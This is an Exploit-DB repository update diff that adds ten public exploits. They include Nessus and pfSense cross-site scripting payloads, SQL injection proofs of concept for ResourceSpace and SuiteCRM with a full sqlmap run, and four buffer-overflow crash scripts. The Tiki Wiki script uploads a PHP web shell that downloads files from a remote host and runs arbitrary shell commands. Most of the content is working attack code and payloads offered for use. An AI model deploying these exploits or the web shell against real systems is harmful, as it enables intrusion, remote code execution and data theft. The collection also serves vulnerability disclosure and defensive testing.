DB: 2019-02-05

10 changes to exploits/shellcodes

MyVideoConverter Pro 3.14 - Denial of Service
River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)
SpotAuditor 3.6.7 - Denial of Service (PoC)
TaskInfo 8.2.0.280 - Denial of Service (PoC)
Tiki Wiki 15.1 - File Upload
ResourceSpace 8.6 - 'watched_searches.php' SQL Injection
SuiteCRM 7.10.7 - 'parentTab' SQL Injection
SuiteCRM 7.10.7 - 'record' SQL Injection
Nessus 8.2.1 - Cross-Site Scripting
pfSense 2.4.4-p1 - Cross-Site Scripting

exploits/multiple/webapps/46315.txt

@@ -0,0 +1,75 @@
+##################################################################################################################################
+# Exploit Title: Nessus 8.2.1 | Stored Cross-Site Scripting
+# Date: 29.01.2019
+# Exploit Author: Ozer Goker
+# Vendor Homepage: https://www.tenable.com
+# Software Link: https://www.tenable.com/downloads/nessus
+# Version: 8.2.1
+##################################################################################################################################
+
+Introduction
+Nessus is #1 For Vulnerability Assessment
+
+From the beginning, we've worked hand-in-hand with the security community. We continuously optimize Nessus based on community feedback to make it the most accurate and comprehensive vulnerability assessment solution in the market. 20 years later and we're still laser focused on community collaboration and product innovation to provide the most accurate and complete vulnerability data - so you don't miss critical issues which could put your organization at risk.
+
+
+#################################################################################
+
+
+XSS details: Stored
+
+#################################################################################
+
+XSS1 | Stored
+
+URL
+https://localhost:8834/policies
+
+METHOD
+Post
+
+PARAMETER
+value
+
+PAYLOAD
+\"><script>alert(1)</script>
+
+
+Request
+
+POST /policies HTTP/1.1
+Host: localhost:8834
+User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0
+Accept: */*
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: https://localhost:8834/
+Content-Type: application/json
+X-API-Token: 9A8BB6D6-2297-47EF-8083-D1EC639444B4
+X-Cookie: token=7856d1d4dfdeb394d00a3993b6c3829df42ba6dbebbcac45
+Content-Length: 3467
+DNT: 1
+Connection: close
+
+{"uuid":"939a2145-95e3-0c3f-f1cc-761db860e4eed37b6eee77f9e101","dynamicPluginFilters":{"joinOperator":"and","filters":[{"filter":"cve","quality":"eq","value":"\"><script>alert(1)</script>"}]},"credentials":{"add":{},"edit":{},"delete":[]},"settings":{"patch_audit_over_rexec":"no","patch_audit_over_rsh":"no","patch_audit_over_telnet":"no","additional_snmp_port3":"161","additional_snmp_port2":"161","additional_snmp_port1":"161","snmp_port":"161","http_login_auth_regex_nocase":"no","http_login_auth_regex_on_headers":"no","http_login_invert_auth_regex":"no","http_login_max_redir":"0","http_reauth_delay":"","http_login_method":"POST","enable_admin_shares":"no","start_remote_registry":"no","dont_use_ntlmv1":"yes","never_send_win_creds_in_the_clear":"yes","attempt_least_privilege":"no","ssh_client_banner":"OpenSSH_5.0","ssh_port":"22","ssh_known_hosts":"","region_hkg_pref_name":"yes","region_syd_pref_name":"yes","region_lon_pref_name":"yes","region_iad_pref_name":"yes","region_ord_pref_name":"yes","region_dfw_pref_name":"yes","microsoft_azure_subscriptions_ids":"","aws_use_https":"yes","aws_verify_ssl":"yes","aws_ui_region_type":"Rest of the World","aws_sa_east_1":"","aws_ap_south_1":"","aws_ap_southeast_2":"","aws_ap_southeast_1":"","aws_ap_northeast_3":"","aws_ap_northeast_2":"","aws_ap_northeast_1":"","aws_eu_north_1":"","aws_eu_central_1":"","aws_eu_west_3":"","aws_eu_west_2":"","aws_eu_west_1":"","aws_ca_central_1":"","aws_us_west_2":"","aws_us_west_1":"","aws_us_east_2":"","aws_us_east_1":"","enable_plugin_list":"no","audit_trail":"full","enable_plugin_debugging":"no","log_whole_attack":"no","max_simult_tcp_sessions_per_scan":"","max_simult_tcp_sessions_per_host":"","max_hosts_per_scan":"30","max_checks_per_host":"5","network_receive_timeout":"5","reduce_connections_on_congestion":"no","slice_network_addresses":"no","stop_scan_on_disconnect":"no","safe_checks":"yes","display_unreachable_hosts":"no","log_live_hosts":"no","reverse_lookup":"no","allow_post_scan_editing":"yes","silent_dependencies":"yes","report_superseded_patches":"yes","report_verbosity":"Normal","scan_malware":"no","enum_local_users_end_uid":"1200","enum_local_users_start_uid":"1000","enum_domain_users_end_uid":"1200","enum_domain_users_start_uid":"1000","request_windows_domain_info":"yes","scan_webapps":"no","test_default_oracle_accounts":"no","provided_creds_only":"yes","smtp_to":"postmaster@[AUTO_REPLACED_IP]","smtp_from":"nobody@example.com","smtp_domain":"example.com","av_grace_period":"0","thorough_tests":"no","report_paranoia":"Normal","detect_ssl":"yes","check_crl":"no","enumerate_all_ciphers":"yes","cert_expiry_warning_days":"60","ssl_prob_ports":"Known SSL ports","svc_detection_on_all_ports":"yes","udp_scanner":"no","syn_scanner":"yes","syn_firewall_detection":"Automatic (normal)","verify_open_ports":"no","only_portscan_if_enum_failed":"yes","snmp_scanner":"yes","wmi_netstat_scanner":"yes","ssh_netstat_scanner":"yes","portscan_range":"default","unscanned_closed":"no","wol_wait_time":"5","wol_mac_addresses":"","scan_ot_devices":"no","scan_netware_hosts":"no","scan_network_printers":"no","ping_the_remote_host":"yes","udp_ping":"no","icmp_ping":"yes","icmp_ping_retries":"2","icmp_unreach_means_host_down":"no","tcp_ping":"yes","tcp_ping_dest_ports":"built-in","arp_ping":"yes","fast_network_discovery":"no","test_local_nessus_host":"yes","acls":[{"object_type":"policy","permissions":0,"type":"default"}],"description":"","name":"test"}}
+
+Response
+
+HTTP/1.1 200 OK
+Cache-Control:
+X-Frame-Options: DENY
+Content-Type: application/json
+Date: : Tue, 29 Jan 2019 12:44:04 GMT
+Connection: close
+Server: NessusWWW
+X-Content-Type-Options: nosniff
+Content-Length: 38
+Expires: 0
+Pragma:
+
+{"policy_id":161,"policy_name":"test"}
+
+
+PoC
+URL
+https://localhost:8834/#/scans/policies/161/config/dynamic-plugins

exploits/multiple/webapps/46316.txt

@@ -0,0 +1,499 @@
+##################################################################################################################################
+# Exploit Title: pfSense 2.4.4-p1 | Cross-Site Scripting
+# Date: 28.01.2019
+# Exploit Author: Ozer Goker
+# Vendor Homepage: https://www.pfsense.org
+# Software Link: https://frafiles.pfsense.org/mirror/downloads/pfSense-CE-2.4.4-RELEASE-p1-amd64.iso.gz
+# Version: 2.4.4-p1
+##################################################################################################################################
+
+Introduction
+pfSense® software is a free, open source customized distribution of FreeBSD specifically tailored for use as a firewall and router that is entirely managed via web interface. In addition to being a powerful, flexible firewalling and routing platform, it includes a long list of related features and a package system allowing further expandability without adding bloat and potential security vulnerabilities to the base distribution.
+
+
+#################################################################################
+
+
+XSS details: Reflected & Stored
+
+#################################################################################
+
+XSS1 | Reflected
+
+URL
+http://192.168.2.200/system_advanced_admin.php
+
+METHOD
+Post
+
+PARAMETER
+webguiproto
+
+PAYLOAD
+"><script>alert(1)</script>
+
+#################################################################################
+
+XSS2 | Reflected
+
+URL
+http://192.168.2.200/interfaces_assign.php
+
+METHOD
+Post
+
+PARAMETER
+wan
+
+PAYLOAD
+"><script>alert(2)</script>
+
+#################################################################################
+
+XSS3 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules
+
+METHOD
+Post
+
+PARAMETER
+dscp
+
+PAYLOAD
+"><script>alert(3)</script>
+
+#################################################################################
+
+XSS4 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules
+
+METHOD
+Post
+
+PARAMETER
+tag
+
+PAYLOAD
+"><script>alert(4)</script>
+
+#################################################################################
+
+XSS5 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules
+
+METHOD
+Post
+
+PARAMETER
+tagged
+
+PAYLOAD
+"><script>alert(5)</script>
+
+#################################################################################
+
+XSS6 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules
+
+METHOD
+Post
+
+PARAMETER
+statetype
+
+PAYLOAD
+"><script>alert(6)</script>
+
+#################################################################################
+
+XSS7 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules
+
+METHOD
+Post
+
+PARAMETER
+vlanprio
+
+PAYLOAD
+"><script>alert(7)</script>
+
+#################################################################################
+
+XSS8 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules
+
+METHOD
+Post
+
+PARAMETER
+vlanprioset
+
+PAYLOAD
+"><script>alert(8)</script>
+
+#################################################################################
+
+XSS9 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules
+
+METHOD
+Post
+
+PARAMETER
+dnpipe
+
+PAYLOAD
+"><script>alert(9)</script>
+
+#################################################################################
+
+XSS10 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=FloatingRules
+
+METHOD
+Post
+
+PARAMETER
+defaultqueue
+
+PAYLOAD
+"><script>alert(10)</script>
+
+#################################################################################
+
+XSS11 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1
+
+METHOD
+Post
+
+PARAMETER
+dscp
+
+PAYLOAD
+"><script>alert(11)</script>
+
+#################################################################################
+
+XSS12 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1
+
+METHOD
+Post
+
+PARAMETER
+tag
+
+PAYLOAD
+"><script>alert(12)</script>
+
+#################################################################################
+
+XSS13 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1
+
+METHOD
+Post
+
+PARAMETER
+tagged
+
+PAYLOAD
+"><script>alert(13)</script>
+
+#################################################################################
+
+XSS14 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1
+
+METHOD
+Post
+
+PARAMETER
+statetype
+
+PAYLOAD
+"><script>alert(14)</script>
+
+#################################################################################
+
+XSS15 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1
+
+METHOD
+Post
+
+PARAMETER
+vlanprio
+
+PAYLOAD
+"><script>alert(15)</script>
+
+#################################################################################
+
+XSS16 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1
+
+METHOD
+Post
+
+PARAMETER
+vlanprioset
+
+PAYLOAD
+"><script>alert(16)</script>
+
+#################################################################################
+
+XSS17 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1
+
+METHOD
+Post
+
+PARAMETER
+dnpipe
+
+PAYLOAD
+"><script>alert(17)</script>
+
+#################################################################################
+
+XSS18 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=wan&after=-1
+
+METHOD
+Post
+
+PARAMETER
+defaultqueue
+
+PAYLOAD
+"><script>alert(18)</script>
+
+#################################################################################
+
+XSS19 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=lan
+
+METHOD
+Post
+
+PARAMETER
+dscp
+
+PAYLOAD
+"><script>alert(19)</script>
+
+#################################################################################
+
+XSS20 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=lan
+
+METHOD
+Post
+
+PARAMETER
+tag
+
+PAYLOAD
+"><script>alert(20)</script>
+
+#################################################################################
+
+XSS21 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=lan
+
+METHOD
+Post
+
+PARAMETER
+tagged
+
+PAYLOAD
+"><script>alert(21)</script>
+
+#################################################################################
+
+XSS22 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=lan
+
+METHOD
+Post
+
+PARAMETER
+statetype
+
+PAYLOAD
+"><script>alert(22)</script>
+
+#################################################################################
+
+XSS23 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=lan
+
+METHOD
+Post
+
+PARAMETER
+vlanprio
+
+PAYLOAD
+"><script>alert(23)</script>
+
+#################################################################################
+
+XSS24 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=lan
+
+METHOD
+Post
+
+PARAMETER
+vlanprioset
+
+PAYLOAD
+"><script>alert(24)</script>
+
+#################################################################################
+
+XSS25 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=lan
+
+METHOD
+Post
+
+PARAMETER
+dnpipe
+
+PAYLOAD
+"><script>alert(25)</script>
+
+#################################################################################
+
+XSS26 | Stored
+
+URL
+http://192.168.2.200/firewall_rules_edit.php?if=lan
+
+METHOD
+Post
+
+PARAMETER
+defaultqueue
+
+PAYLOAD
+"><script>alert(26)</script>
+
+#################################################################################
+
+XSS27 | Reflected
+
+URL
+http://192.168.2.200/firewall_shaper.php
+
+METHOD
+Post
+
+PARAMETER
+name
+
+PAYLOAD
+"><script>alert(27)</script>
+
+#################################################################################
+
+XSS28 | Stored
+
+URL
+http://192.168.2.200/services_igmpproxy_edit.php
+
+METHOD
+Post
+
+PARAMETER
+address0
+
+PAYLOAD
+"><script>alert(28)</script>
+
+#################################################################################
+
+XSS29 | Stored
+
+URL
+http://192.168.2.200/services_ntpd_gps.php
+
+METHOD
+Post
+
+PARAMETER
+gpstype
+
+PAYLOAD
+"><script>alert(29)</script>
+
+#################################################################################
+
+XSS30 | Reflected
+
+URL
+http://192.168.2.200/diag_traceroute.php
+
+METHOD
+Post
+
+PARAMETER
+host
+
+PAYLOAD
+"><script>alert(30)</script>
+
+#################################################################################

exploits/php/webapps/40053.py

@@ -0,0 +1,33 @@
+#!/usr/bin/python 
+# недействительный 31337 Team
+# p4yl04d = https://bethebeast.pl/?p=953    [[::ch4n6e 1p::]]
+
+import requests
+import json
+from requests.auth import HTTPBasicAuth
+
+url = 'http://192.168.1.152:8080/tiki/vendor_extra/elfinder/php/connector.minimal.php'
+
+headers = {
+    'Host': '192.168.1.152:8080',
+    'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)',
+    'Content-Type': 'multipart/form-data; boundary=_Part_1337'
+}
+
+payload = (
+    '--_Part_1337\n'
+    'Content-Disposition: form-data; name="cmd"\n\n'
+    'upload\n'
+    '--_Part_1337\n'
+    'Content-Disposition: form-data; name="target"\n\n'
+    'l1_Lw\n'
+    '--_Part_1337\n'
+    'Content-Disposition: form-data; name="upload[]"; filename="evil.php"\n'
+    'Content-Type: application/octet-stream)\n\n'
+    '/*<?php /**/ error_reporting(0); if (isset($_REQUEST["fupload"])) { file_put_contents($_REQUEST["fupload"], file_get_contents("http://192.168.1.10/" . $_REQUEST["fupload"]));};if (isset($_REQUEST["fexec"])) { echo "<pre>" . shell_exec($_REQUEST["fexec"]) . "</pre>";};\n'
+    '--_Part_1337--\n'
+    )
+
+# If your target uses authentication then use: 
+# upload = requests.post(url, headers=headers, data=payload, auth=('admin', 'admin'))
+upload = requests.post(url, headers=headers, data=payload)

exploits/php/webapps/46308.txt

@@ -0,0 +1,67 @@
+# Exploit Title: ResourceSpace <=8.6 'watched_searches.php' SQL Injection
+# Dork: intext:"Powered by ResourceSpace"
+# Date: 2019-02-01
+# Exploit Author: dd_ (info@malicious.group)
+# Vendor Homepage: https://www.resourcespace.com/
+# Software Link: https://www.resourcespace.com/get
+# Version: Stable release: 8.6 (Minor: 12603)
+# Tested on: PHP/MySQL (PHP 7.2 / MySQL 5.7.25-0ubuntu0.18.04.2-log)
+# Research IRC: irc.blackcatz.org #blackcatz
+# Vendor Banner: ResourceSpace open source digital asset management software is the simple, fast, & free way to organise your digital assets.
+
+
+# POC:
+# 1)
+# http://resourcespace.local/plugins/rse_search_notifications/pages/watched_searches.php?offset=0&callback=checknow&ref=[SQL]&ajax=true&_=1548992497510
+
+
+
+# Example:
+#
+[notroot@malicious ~]$ sqlmap -u 'http://resourcespace.local:80/plugins/rse_search_notifications/pages/watched_searches.php?offset=0&callback=checknow&ref=2'\''&ajax=true&_=1548992497510' --cookie='cookiecheck=true;language=en-US;user=d170aee58aadb30833490bc38aecc85b;thumbs=show;saved_col_order_by=created;saved_col_sort=ASC;per_page_list=15;saved_find=some;display=thumbs;saved_offset=0;per_page=48;saved_sort=DESC;restypes=1%2C2%2C3%2C4' --dbms=mysql --level=5 --risk=3 --technique=BEUST -p ref --dbs
+
+
+
+[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
+
+[*] starting @ 15:27:03 /2019-02-01/
+
+[15:27:03] [WARNING] it appears that you have provided tainted parameter values ('ref=2'') with most likely leftover chars/statements from manual SQL injection test(s). Please, always use only valid parameter values so sqlmap could be able to run properly
+are you really sure that you want to continue (sqlmap could have problems)? [y/N] y
+[15:27:03] [INFO] testing connection to the target URL
+[15:27:03] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
+sqlmap resumed the following injection point(s) from stored session:
+---
+Parameter: ref (GET)
+    Type: boolean-based blind
+    Title: AND boolean-based blind - WHERE or HAVING clause
+    Payload: offset=0&callback=checknow&ref=2' AND 6321=6321# YBHT&ajax=true&_=1548992497510
+
+    Type: error-based
+    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)
+    Payload: offset=0&callback=checknow&ref=-5346 OR 1 GROUP BY CONCAT(0x716b6a6271,(SELECT (CASE WHEN (9852=9852) THEN 1 ELSE 0 END)),0x716b627671,FLOOR(RAND(0)*2)) HAVING MIN(0)#&ajax=true&_=1548992497510
+
+    Type: UNION query
+    Title: Generic UNION query (random number) - 12 columns
+    Payload: offset=0&callback=checknow&ref=-5045 UNION ALL SELECT CONCAT(0x716b6a6271,0x676e72684e744a54485a747a4c5249684657485649744b416866756b7955614d646f636d457a7179,0x716b627671),6594,6594,6594,6594,6594,6594,6594,6594,6594,6594,6594-- ajba&ajax=true&_=1548992497510
+---
+[15:27:03] [INFO] testing MySQL
+[15:27:04] [INFO] confirming MySQL
+[15:27:04] [WARNING] reflective value(s) found and filtering out
+[15:27:04] [INFO] the back-end DBMS is MySQL
+web server operating system: Linux Ubuntu
+web application technology: Apache 2.4.29
+back-end DBMS: MySQL >= 5.0.0
+[15:27:04] [INFO] fetching database names
+[15:27:04] [INFO] used SQL query returns 3 entries
+[15:27:04] [INFO] resumed: 'information_schema'
+[15:27:04] [INFO] resumed: 'mybb'
+[15:27:04] [INFO] resumed: 'resourcespace'
+available databases [3]:                                                                                                                                                                                         
+[*] information_schema
+[*] mybb
+[*] resourcespace
+
+[15:27:04] [INFO] fetched data logged to text files under '/home/notroot/.sqlmap/output/resourcespace.local'
+
+[*] ending @ 15:27:04 /2019-02-01/

exploits/php/webapps/46310.txt

@@ -0,0 +1,35 @@
+####################################################################
+
+# Exploit Title: SuiteCRM 7.10.7 - 'parentTab' SQL Vulnerabilities
+# Dork: N/A
+# Date: 03-02-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://suitecrm.com/
+# Software Link: https://suitecrm.com/download/
+# Version: 7.10.7
+# Category: Webapps
+# Tested on: Wampp @Win
+# CVE: N/A
+# Software Description: SuiteCRM was awarded the 2015 BOSSIE by InfoWorld
+  as the world's best open source Customer Relationship Management (CRM)
+application.
+
+####################################################################
+
+# Vulnerabilities
+# This web application called as SuiteCRM 7.10.7 version.
+# After logging in, enter the email section.
+  then change the collaboration to 9999999 (This bypass Method). Add the
+following codes to the end of the URL.
+
+####################################################################
+
+# POC - SQL (Boolean Based)
+# Parameters : parentTab
+# Attack Pattern : aNd if(length(0x454d49524f474c55)>1,sleep(5),0)
+# Refer Adress:
+http://localhost/SuiteCRM/index.php?module=Emails&action=index&parentTab=Collaboration
+# GET Request :
+http://localhost/SuiteCRM/index.php?module=Emails&action=index&parentTab=99999999%27)/**/oR/**/6617279=6617279/**/aNd/**/(%276199%27)=(%276199
+
+####################################################################

exploits/php/webapps/46311.txt

@@ -0,0 +1,33 @@
+####################################################################
+
+# Exploit Title: SuiteCRM 7.10.7 - 'record' SQL Vulnerabilities
+# Dork: N/A
+# Date: 03-02-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage: https://suitecrm.com/
+# Software Link: https://suitecrm.com/download/
+# Version: 7.10.7
+# Category: Webapps
+# Tested on: Wampp @Win
+# CVE: N/A
+# Software Description: SuiteCRM was awarded the 2015 BOSSIE by InfoWorld
+  as the world's best open source Customer Relationship Management (CRM)
+application.
+
+####################################################################
+
+# Vulnerabilities
+# This web application called as SuiteCRM 7.10.7 version.
+# After logging in, enter the user section. then view the user details.
+  Add the following codes to the end of the URL.
+
+####################################################################
+
+# POC - SQL (Time Based)
+# Parameters : record
+# Attack Pattern : aNd if(length(0x454d49524f474c55)>1,sleep(5),0)
+# GET Request :
+http://localhost/SuiteCRM/index.php?module=Users&action=DetailView&record=1
+aNd if(length(0x454d49524f474c55)>1,sleep(5),0)
+
+####################################################################

exploits/windows/dos/46309.py

@@ -0,0 +1,29 @@
+# Exploit Title: MyVideoConverter Pro 3.14 Denial of Service
+# Date: 03.02.2019
+# Vendor Homepage: http://www.ivideogo.com/
+# Software Link :  http://www.ivideogo.com/
+# Exploit Author: Achilles
+# Tested Version: 3.14
+# Tested on: Windows 7 x64
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+ 
+# Steps to Produce the Crash: 
+# 1.- Run python code : MyVideoConverter_Pro.py
+# 2.- Open EVIL.txt and copy content to clipboard
+# 3.- Open MyVideoConverter Pro
+# 4.- Paste the content of EVIL.txt into the field: 'Copy and Paste Registration Code'
+# 5.- Click ok
+# 5.- And you will see a crash.
+
+#!/usr/bin/env python
+
+buffer = "\x41" * 10000
+
+try:
+	f=open("Evil.txt","w")
+	print "[+] Creating %s bytes evil payload.." %len(buffer)
+	f.write(buffer)
+	f.close()
+	print "[+] File created!"
+except:
+	print "File cannot be created"

exploits/windows/dos/46312.py

@@ -0,0 +1,23 @@
+# Exploit Title: River Past Ringtone Converter v2.7.6.1601 - Denial of Service (PoC)
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2019-01-30
+# Vendor Homepage: http://www.riverpast.com/
+# Software Link : http://www.riverpast.com/
+# Tested Version: v2.7.6.1601
+# Tested on: Windows XP SP3
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run RingtoneConverter.exe
+# 2.- copy content RingtoneConverter_Crash.txt to clipboard (result from this python script)
+# 3.- Go to "Help" - "Activate..." and paste the result in the "Email" textbox and "Activation code" textarea.
+# 4.- Click in Activate button and you will see a crash.
+
+
+#!/usr/bin/env python
+
+
+crash = "\x41" * 300
+f = open ("RingtoneConverter_Crash.txt", "w")
+f.write(crash)
+f.close()

exploits/windows/dos/46313.py

@@ -0,0 +1,23 @@
+# Exploit Title: SpotAuditor v3.6.7 - Denial of Service (PoC)
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2019-01-30
+# Vendor Homepage: http://www.nsauditor.com/order.html
+# Software Link : http://www.nsauditor.com/order.html
+# Tested Version: v3.6.7
+# Tested on: Windows XP SP3
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run SpotAuditor.exe
+# 2.- copy content SpotAuditor_Crash.txt to clipboard (result from this python script)
+# 3.- Go to "Tools" - "Base64 Password Decoder" and paste the result in the "Base64 Encrypted Password:" textbox.
+# 4.- Click in Decrypt button and you will see a crash.
+
+
+#!/usr/bin/env python
+
+
+crash = "\x41" * 2000
+f = open ("SpotAuditor_Crash.txt", "w")
+f.write(crash)
+f.close()

exploits/windows/dos/46314.py

@@ -0,0 +1,23 @@
+# Exploit Title: TaskInfo v8.2.0.280 - Denial of Service (PoC)
+# Discovery by: Rafael Pedrero
+# Discovery Date: 2019-01-30
+# Vendor Homepage: http://www.iarsn.com/
+# Software Link : http://www.iarsn.com/
+# Tested Version: v8.2.0.280
+# Tested on: Windows XP SP3
+# Vulnerability Type: Denial of Service (DoS) Local Buffer Overflow
+
+# Steps to Produce the Crash:
+# 1.- Run TaskInfo.exe
+# 2.- copy content TaskInfo_Crash.txt to clipboard (result from this python script)
+# 3.- Go to "Help" - "Registration" - "Set or View Registration Information" and paste the result in the "New User Name:" and "New Serial Number:" textbox.
+# 4.- Click in OK button and you will see a crash.
+
+
+#!/usr/bin/env python
+
+
+crash = "\x41" * 1000
+f = open ("TaskInfo_Crash.txt", "w")
+f.write(crash)
+f.close()

files_exploits.csv

@@ -6292,6 +6292,10 @@ id,file,description,date,author,type,platform,port
 46299,exploits/multiple/dos/46299.c,"macOS < 10.14.3 / iOS < 12.1.3 XNU - 'vm_map_copy' Optimization which Requires Atomicity isn't Atomic",2019-01-31,"Google Security Research",dos,multiple,
 46300,exploits/multiple/dos/46300.c,"macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics",2019-01-31,"Google Security Research",dos,multiple,
 46304,exploits/windows/dos/46304.py,"Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)",2019-02-01,"Rafael Pedrero",dos,windows,
+46309,exploits/windows/dos/46309.py,"MyVideoConverter Pro 3.14 - Denial of Service",2019-02-04,Achilles,dos,windows,
+46312,exploits/windows/dos/46312.py,"River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
+46313,exploits/windows/dos/46313.py,"SpotAuditor 3.6.7 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
+46314,exploits/windows/dos/46314.py,"TaskInfo 8.2.0.280 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -40774,3 +40778,9 @@ id,file,description,date,author,type,platform,port
 46276,exploits/php/webapps/46276.txt,"PDF Signer 3.0 - Server-Side Template Injection leading to Remote Command Execution (via Cross-Site Request Forgery Cookie)",2019-01-29,dd_,webapps,php,80
 46282,exploits/php/webapps/46282.txt,"Rukovoditel Project Management CRM 2.4.1 - 'lists_id' SQL Injection",2019-01-30,"Mehmet EMIROGLU",webapps,php,80
 46305,exploits/windows/webapps/46305.txt,"SureMDM < 2018-11 Patch - Local / Remote File Inclusion",2019-02-01,"Digital Interruption",webapps,windows,80
+40053,exploits/php/webapps/40053.py,"Tiki Wiki 15.1 - File Upload",2016-07-07,"Ivan Ivanovic",webapps,php,80
+46308,exploits/php/webapps/46308.txt,"ResourceSpace 8.6 - 'watched_searches.php' SQL Injection",2019-02-04,dd_,webapps,php,
+46310,exploits/php/webapps/46310.txt,"SuiteCRM 7.10.7 - 'parentTab' SQL Injection",2019-02-04,"Mehmet EMIROGLU",webapps,php,
+46311,exploits/php/webapps/46311.txt,"SuiteCRM 7.10.7 - 'record' SQL Injection",2019-02-04,"Mehmet EMIROGLU",webapps,php,
+46315,exploits/multiple/webapps/46315.txt,"Nessus 8.2.1 - Cross-Site Scripting",2019-02-04,"Ozer Goker",webapps,multiple,
+46316,exploits/multiple/webapps/46316.txt,"pfSense 2.4.4-p1 - Cross-Site Scripting",2019-02-04,"Ozer Goker",webapps,multiple,